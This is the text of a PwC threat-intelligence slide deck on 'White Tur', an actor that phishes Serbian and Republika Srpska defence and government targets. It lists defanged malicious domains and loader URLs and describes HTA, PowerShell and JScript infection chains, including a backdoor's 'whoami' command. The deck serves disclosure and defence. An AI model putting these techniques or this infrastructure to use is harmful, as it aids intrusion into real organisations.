Threat actor of

in-Tur-est:
Unveiling Balkan targeting
January 2022
Introduction

Jack Simpson Louise Taggart

Principal Analyst Senior TI Manager
PwC PwC

Been in the team for 4 years focusing on Been in the team for 6.5 years focusing on
the EURO region (technical) the EURO region (strategic)

• West Ham fan (soccer) • Middlesbrough fan (soccer)

• Nearly cried watching the EURO finals • Foreign language nerd (E Europe & Balkans)
• Big fan of Goose Island IPAs • Proponent of Georgian food
• Technical side of this White Tur talk • I’ll be covering the geographic context of White Tur

@linkcabin @loutagtech

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Where it began

We observed the domain qov[.]rs being registered on

29th January 2021.
When later visiting the page, an HTTrack comment was
in the HTML code, showing its capture date, 31st
January 2021.
Once the domain was reported on publicly by a security
researcher on Twitter, it stopped resolving within a few
hours.
The phishing page was online for two weeks.
We attributed this activity to a new threat actor name,
‘White Tur’.

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

 White Tur clustered
infrastructure

• After pivoting from IP resolutions based on qov[.]rs

we identified additional infrastructure.
• Additional domains were observed showing interest in
Serbia and Republika Srpska due to the domains
masquerading as organisations in these regions.

Malicious Domain Legitimate Domain Description

sajam[.]us sajam[.]rs Exhibition centre in Serbia, which has hosted defence fairs

mtel[.]ac mtel[.]ba Telecommunications company based in the region

vladars[.]co vladars[.]net Republika Srpska government domain

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE
Vladars targeting
• Ministry of Interior for Republika
Srpska alerting on phishing activity in
2020 with the email set as
kabinet@vladars[.]co

• We observed a file on the

vladars[.]co domain on 23rd April
2020.

hxxps[:]//vladars[.]co/download.php?act
=dl&id=5611

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

hxxps[:]//mup[.]vladars[.]net/index.php?vijest=vtk&id=23325&vrsta=aktuelnosti
Vladars targeting
We later observed the URL hxxps[:]//webmail[.]vladars[.]net/owa/redir.aspx?C=wOEXQr_r5qV1iK20XXYj8jKY-
nbtiVCs2Xz79nmeO2zJWyamjOfXCA..&URL=hxxps[:]//vladars[.]co/download.php?act=dl&id=5611. Showing an
outbound link to the malicious domain vladars[.]co.

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

 Vladars targeting

vladars[.]co

The malicious HTA file HTA window background The two domains
attempts to download code colour set to #3961a2, vladars[.]co and
94.156.189[.]122
from dropbox- which was used to pivot dropbox-online[.]pro
online[.]pro to additional samples are linked via IP
resolutions

dropbox-
online[.]pro

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Common handles

tensho shadz atarox programming

Infrastructure Weaponised documents Malware

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Threat Actor themes

Research and development Military and weapons suppliers

Government Metal processing factory

Ammunition identification technology Ammunition factory

Telecommunications and internet provider

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Defence and government targeting

CVs and annual defence reports

used as lures for weaponised
documents and archives

Threat actor uses recent internal

documents with malicious campaigns
within days (1-6 days)

Threat actor compromised a website

which had open directory listings
available

Document lure used by threat actor

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

PowerShell scripts
• Uses WMI objects and BitsTransfer service extensively with PowerShell scripts

• Often used in HTA script infection chain

Stage 1 PowerShell

PowerShell LNK Dropper

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE
JScript backdoor
LOADER PAYLOAD
Weaponised Document XSL file LNK file JScript JScript

• JScript (Not JavaScript!) is one of the interpreted languages used in Windows Script Host (wscript.exe)

• Use of RC4 to decrypt the payload, evading static analysis

• XSL scripts most popular choice by White Tur to execute JScript payload from weaponised document

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Binary analysis
• Early backdoor samples contain
only three commands:
– EX (Execute command)
– SL (Sleep)
– BY (Default response)

Initial check in
Example command
C:\Windows\System32\cmd.exe/C
whoami >
C:\Users\<user>\AppData\Local\Temp\
{6279BFE5-918F-
4821-9CA8-3DAD11ADCF5B}

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting Command results call back TLP: WHITE
OpenHardware Monitor backdoor
• Threat actor used pre-build events in Visual Studio to execute a backdoor.

• The technique was previously used by ZINC/Lazarus (which we track as Black Artemis), an unrelated threat
actor, at the start of 2021 reported by Microsoft.

• Pre-build event code is found in OpenHardwareMonitorLib.csproj

• Execution of he malware named WOFUTIL.dll or command.dat

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Crime links

command.dat is a signed file, the

digital signature name is STA-R TOV.

Uses common White Tur handle,

C:\Users\tensho\Desktop\StormK
itty-
master\Cameleon\Release\Camele
on.pdb
Digital signature is shared with a
number of other malware families
connected from our analysis to
different threat actors such as
White Magician (a.k.a. Trickbot).

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Crime links

Author White Tur CV Sample Suspected Crime sample

Metadata

Author hxxp[:]//149.255.35[.]96/snow.xml hxxp[:]//149.255.35[.]96/snow.xml

Metadata

Loader URL hxxp[:]//193.37.212[.]54/load_js. hxxp[:]//safe-

php?id=212209074875547 redirect[.]pw/load_js.php?id=664548

Submission RS US, JP
country of
origin

Number of 1 4
files

Hosted N/A hxxp[:]//buisnessinfobilling[.]com

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Other links

Unrelated threat actors registering old White Tur domains

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Attribution = difficult!

“Establishing attribution for cyber

operations is difficult but not impossible”

US Office of the Director of National

Intelligence

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Context of targeting:
Serbia and Republika Srpska

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Context of targeting:
Serbia and Republika Srpska

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Context of targeting:
Serbia and Republika Srpska

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Defence sector

Serbia:
Serbia is the largest regional
military spender
Serbian defence industry is
dominated by state-owned
enterprises

Republika Srpska:
Dayton Peace Agreement led
to significant reforms for
Republika Srpska (RS)
Single state-level central
command

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Vested interests: Bosnia-Herzegovina

Growing support in RS for withdrawal from state-level institutions

Tensions between constituent federal entities

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Vested interests: Kosovo
Unilateral declaration of independence in 2008

NATO peacekeeping mission remains in place

Cross-border tensions result in deployments at crossing points in 2021

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Vested interests: Russia

Significant cultural ties with

Balkans region

Close ally of Serbia, including

supplying military hardware

Mutual support on areas including

international recognition

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Vested interests: China

Serbia has sought to

position itself as a strategic
hub for China

Serbia has provided a

foothold in the European
defence market

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Vested interests: The West

Member of NATO’s
Partnership for Peace
programme
EU is key trading partner for
Serbia

Bosnia’s EU progress is
hampered by complex
constitutional structure

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Next steps with tracking White Tur

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

 https://pwc.to/3qEdvsN

Question time!

More information on:

PwC Cyber Threat Intelligence
Check out our blog on White Tur
Sign up for our 2021 Year in Retrospect report

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Appendix A: Indicators of Compromise

6eddc8757fc921dfd7a627b4c5d638c3eb18b83964fa85dc7aa3187b155bda73
vladars[.]co
Archive containing HTA script: dropbox-online[.]pro
94.156.189[.]122

4eee7e165c6f4725781be0f249048a43a78ac039f576dd6b30498c15fb144567
Weaponized CV sample: microsoft[.]update-store[.]com
185.203.118[.]2

d69561ad67f7387e6460a81111878b7bc727cbe6100b952ba5eed38694952e4b
XSL script with JScript backdoor: 149.255.35[.]96
adobe-documents[.]com

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Appendix A: Indicators of Compromise

Domains: URLS:

qov[.]rs hxxp[:]//149.255.35[.]96/snow.xml
sajam[.]us hxxp[:]//safe-redirect[.]pw/load_js.php?id=664548
mtel[.]ac hxxp[:]//193.37.212[.]54/load_js.php?id=212209074875
vladars[.]co 547
dropbox-online[.]pro hxxp[:]//buisnessinfobilling[.]com
onedrive-login[.]net
onedrive-login[.]us

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Appendix B: MITRE ATT&CK
Command and Scripting Interpreter: PowerShell - https://attack.mitre.org/techniques/T1059/001/

User Execution: Malicious File - https://attack.mitre.org/techniques/T1204/002/

Exfiltration Over Command and Control Channel - https://attack.mitre.org/techniques/T1041/

Command and Scripting Interpreter: Visual Basic - https://attack.mitre.org/techniques/T1059/005/

Command and Scripting Interpreter: Windows Command Shell - https://attack.mitre.org/techniques/T1059/003/

Bits Jobs - https://attack.mitre.org/techniques/T1197/

Deobfuscate/Decode Files or Information - https://attack.mitre.org/techniques/T1140/

XSL Script Processing - https://attack.mitre.org/techniques/T1220/

Template Injection - https://attack.mitre.org/techniques/T1221/

File and Directory Discovery - https://attack.mitre.org/techniques/T1082

Software Discovery: Security Software Discovery - https://attack.mitre.org/techniques/T1518/001/

System Information Discovery - https://attack.mitre.org/techniques/T1082/

PwC - Threat actor of in-Tur-est : Unveiling Balkan targeting TLP: WHITE

Thank you

pwc.com

This publication has been prepared for general guidance on matters of interest only, and does not constitute professional advice. You should not act upon the information contained in this publication without obtaining
specific professional advice. No representation or warranty (express or implied) is given as to the accuracy or completeness of the information contained in this publication, and, to the extent permitted by law,
PricewaterhouseCoopers LLP, its members, employees and agents do not accept or assume any liability, responsibility or duty of care for any consequences of you or anyone else acting, or refraining to act, in
reliance on the information contained in this publication or for any decision based on it.

© 2022 PwC. All rights reserved. Not for further distribution without the permission of PwC. “PwC” refers to the network of member firms of PricewaterhouseCoopers International Limited (PwCIL), or, as the context
requires, individual member firms of the PwC network. Each member firm is a separate legal entity and does not act as agent of PwCIL or any other member firm. PwCIL does not provide any services to clients.
PwCIL is not responsible or liable for the acts or omissions of any of its member firms nor can it control the exercise of their professional judgment or bind them in any way. No member firm is responsible or liable for
the acts or omissions of any other member firm nor can it control the exercise of another member firm’s professional judgment or bind another member firm or PwCIL in any way.